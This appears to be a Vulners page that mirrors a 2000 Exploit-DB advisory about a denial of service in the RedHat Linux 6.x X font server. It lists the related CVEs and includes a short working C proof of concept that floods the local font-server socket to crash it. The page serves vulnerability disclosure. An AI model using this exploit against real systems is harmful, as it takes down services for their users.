Lucene search
+L

RedHat Linux 6.x - X Font Server Buffer Overflow (Denial of Service)

🗓️ 16 Apr 2000 00:00:00Reported by Michal ZalewskiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

Denial of service in X font server of RedHat Linux 6.x due to improper input validation issues.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2000-0263
13 Oct 200004:00
cve
CVE
CVE-2000-0286
26 Apr 200004:00
cve
Cvelist
CVE-2000-0263
13 Oct 200004:00
cvelist
Cvelist
CVE-2000-0286
26 Apr 200004:00
cvelist
EUVD
EUVD-2000-0262
7 Oct 202500:30
euvd
EUVD
EUVD-2000-0285
7 Oct 202500:30
euvd
NVD
CVE-2000-0263
16 Apr 200004:00
nvd
NVD
CVE-2000-0286
16 Apr 200004:00
nvd
// source: https://www.securityfocus.com/bid/1111/info

A denial of service exists in the X11 font server shipped with RedHat Linux 6.x. Due to improper input validation, it is possible for any user to crash the X fontserver. This will prevent the X server from functioning properly.

Additional, similar problems exist in the stock xfs. Users can crash the font server remotely, and potential exists for buffer overruns. The crux of the problem stems from the font server being lax about verifying network input. While no exploits exist, it is likely they are available in private circles, and can result in remote root compromise.

#include <sys/socket.h>
#include <sys/un.h>

#define CNT 50
#define FS "/tmp/.font-unix/fs-1"

int s,y;
struct sockaddr_un x;

char buf[CNT];

main() {
  for (y;y<2;y++) {
    s=socket(PF_UNIX,SOCK_STREAM,0);
    x.sun_family=AF_UNIX;
    strcpy(x.sun_path,FS);
    if (connect(s,&x,sizeof(x))) { perror(FS); exit(1); }
    if (!y) write(s,"lK",2);
    memset(buf,'A',CNT);
    write(s,buf,CNT);
    shutdown(s,2);
    close(s);
  }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jul 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.01016
25